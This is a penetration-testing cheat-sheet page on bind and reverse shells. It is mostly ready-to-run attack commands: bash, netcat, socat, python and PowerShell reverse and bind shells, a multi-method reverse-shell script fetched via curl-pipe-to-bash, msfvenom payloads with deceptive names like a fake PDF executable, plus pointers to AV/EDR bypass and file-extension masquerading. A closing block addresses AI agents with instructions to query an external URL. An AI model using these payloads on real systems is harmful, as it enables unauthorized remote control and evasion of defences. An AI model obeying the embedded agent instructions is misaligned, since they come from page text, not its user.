# Bind and Reverse Shell ## Tools ### Online {% embed url="" %} ### LazyRevShell {% embed url="" %} LazyShell {% endembed %}

### One-Lin3r {% embed url="" %} One-Lin3r {% endembed %} ``` pip install one-lin3r ```

### FuegoShell {% embed url="" %} ## Web Shells {% content-ref url="/pages/T4JGQDdvKRiioaVzxp5X" %} [Web Shell](/0xss0rz/pentest/shells/web-shell.md) {% endcontent-ref %} ## Reverse Shell - Not Web {% embed url="" %} Online - Reverse Shell Generator {% endembed %} {% embed url="" %} {% embed url="" %} {% embed url="" %} ### revshell.sh - Test all methods ```bash #!/bin/bash # Replace with your IP address YOUR_IP="" PORT=2121 # Attempt to use different methods for a reverse shell if command -v bash > /dev/null; then bash -i >& /dev/tcp/$YOUR_IP/$PORT 0>&1 elif command -v nc > /dev/null; then nc $YOUR_IP $PORT -e /bin/bash elif command -v python3 > /dev/null; then python3 -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")" elif command -v python > /dev/null; then python -c "import socket,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"$YOUR_IP\",$PORT)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn(\"/bin/bash\")" elif command -v perl > /dev/null; then perl -e "use Socket; \$i=\"$YOUR_IP\"; \$p=$PORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); connect(S,sockaddr_in(\$p,inet_aton(\$i))); open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/bash -i\");" else echo "No suitable reverse shell method found." fi ``` ``` curl http://IP/revshell.sh|bash ``` ### rs-shell - RS in Rust {% embed url="" %} Rust RS {% endembed %} ### Secure Reverse Shell Reverse shell tool that uses AES-GCM (256-bit) encryption and ECDH (Curve P-256) to ensure encrypted and protected communication {% embed url="" %} ### FullBypass Bypass AMSI {% embed url="" %} ### rcat {% embed url="" %} ### RevShellGenerator A **polymorphic PowerShell reverse shell generator** that produces a unique, heavily obfuscated payload on every run — no two outputs look alike. {% embed url="" %} ### PowerJoker - Powershell Reverse Shell - Bypass Defender {% embed url="" %} ### Over UDP {% embed url="" %} ### Attack Host `nc -nlvp 1234` ### Netcat - Victim ``` # Attacker nc -nlvp [PORT] # Victim ## Windows nc.exe [IP] [PORT] -e cmd.exe ## Linux nc [IP] [PORT] -e /bin/bash ## if -e option doesn't work mkfifo /tmp/f; nc < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f ``` #### Netcat traditional ``` # Attacker nc -nlvp [PORT] # Victim nc.traditional -e/bin/sh [IP] [PORT] ``` ### Socat - Victim ``` # Attacker socat TCP-L: - # Victim ## Windows socat TCP:: EXEC:powershell.exe,pipes ## Linux socat TCP:: EXEC:"bash -li" ###################### # Attacker socat TCP-L: FILE:`tty`,raw,echo=0 # Victim socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane ``` #### Encrypted ``` # 1 - Generate a certificate openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt # 2 - merge the two created files into a single .pem cat shell.key shell.crt > shell.pem #### REVERSE SHELL #### # 3 - Reverse shell listener socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 - # 4 - Connect back socat OPENSSL::,verify=0 EXEC:/bin/bash ``` ### Bash - Victim ``` bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' bash -c 'sh -i >& /dev/tcp/10.10.14.44/4444 0>&1' rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f bash -i >& /dev/tcp// 0>&1 exec 5<>/dev/tcp//;cat <&5 | while read line; do $line 2>&5 >&5; done exec /bin/sh 0/ 1>&0 2>&0 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` ### Python - Victim ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### Powershell - Victim {% hint style="success" %} *Also Check* [*PowerJocker*](#powerjoker-powershell-reverse-shell-bypass-defender) *and* [*FuegoShell*](#fuegoshell) {% endhint %} ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()" ``` If: ```cmd-session At line:1 char:1 + $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent ``` \=> Disable AV {% content-ref url="/pages/3H9JTtBNJqIsmdr4TW9A" %} [Disable / Remove AV Defender and Firewall](/0xss0rz/pentest/internal-pentest/disable-remove-av-defender-and-firewall.md) {% endcontent-ref %} #### Invoke-PowershellTcp.ps1 {% embed url="" %} `PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444` ### DLL {% embed url="" %} ### MSFVenom {% embed url="" %} ``` msfvenom -p Ex: msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST= LPORT= msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi Payload naming convention: // Ex: linux/x86/shell_reverse_tcp msfvenom --list payloads | grep "linux/x86/meterpreter" Listener: msfconsole use multi/handler ``` #### Linux ```shell-session $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 74 bytes Final size of elf file: 194 bytes ``` #### Windows ```shell-session msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes ``` ```shell-session $ msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 712 bytes Final size of exe file: 7168 bytes Saved as: backupscript.exe ``` ```shell-session msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf6 exploit(multi/handler) > set lport 8000 lport => 8000 msf6 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://0.0.0.0:8000 ``` Cheatsheet: {% embed url="" %} More on: {% content-ref url="/pages/dtkGhaNT9goTjNNZVnYQ" %} [Metasploit](/0xss0rz/pentest/tools/metasploit.md) {% endcontent-ref %} #### Bypass AV / EDR {% embed url="" %} ### Curl {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Bind Shell - Not Web {% embed url="" %} ### Netcat -Victim ```shell-session nc -lvnp 7777 ``` ``` # Victim ## Linux nc -vlp [PORT] -e /bin/bash ## Windows nc.exe -nlvp [PORT] -e cmd.exe ## if -e option doesn't work mkfifo /tmp/f; nc -lvnp < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f # Attacker nc [IP] [PORT] #### BIND SHELL #### copy the PEM file on target # 3 - Target socat OPENSSL-LISTEN:,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes # 4 - Attacker socat OPENSSL::,verify=0 - ``` #### Encrypted shell ``` # 1 - Generate a certificate openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt # 2 - merge the two created files into a single .pem cat shell.key shell.crt > shell.pem ``` ### Socat - Vicitim ``` # Victim ## Windows socat TCP-L: EXEC:powershell.exe,pipes ## Linux socat TCP-L: EXEC:"bash -li" # Attacker socat TCP:: - ``` ### Bash - Victim ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f ``` ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f ``` #### **Debugging** ``` htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f nc: getnameinfo: Temporary failure in name resolution htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 10.129.201.134 1234 >/tmp/f usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl] [-m minttl] [-O length] [-P proxy_username] [-p source_port] [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]] [destination] [port] htb-student@ubuntu:~$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 10.129.201.134 1234 >/tmp/f ``` ### Python - Victim ```python python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' ``` ### Powershell - Vicitm ```powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); ``` #### Invoke-PowershellTcp.ps1 {% embed url="" %} `PS > Invoke-PowerShellTcp -Bind -Port 4444` ### Attack Host ```shell-session nc -nv 10.129.41.200 7777 ``` ## Right to left override - Masquerading {% embed url="" %} Takes a file (usually executable) and appends a Unicode right to left override character to disguise the real file extension {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Shell inside a PNG {% embed url="" %} ## TTY upgrade {% content-ref url="/pages/16bwEEpyWa92Oc6gtbya" %} [TTY Upgrade](/0xss0rz/pentest/shells/tty-upgrade.md) {% endcontent-ref %} ## Resources {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/shells/bind-and-reverse-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.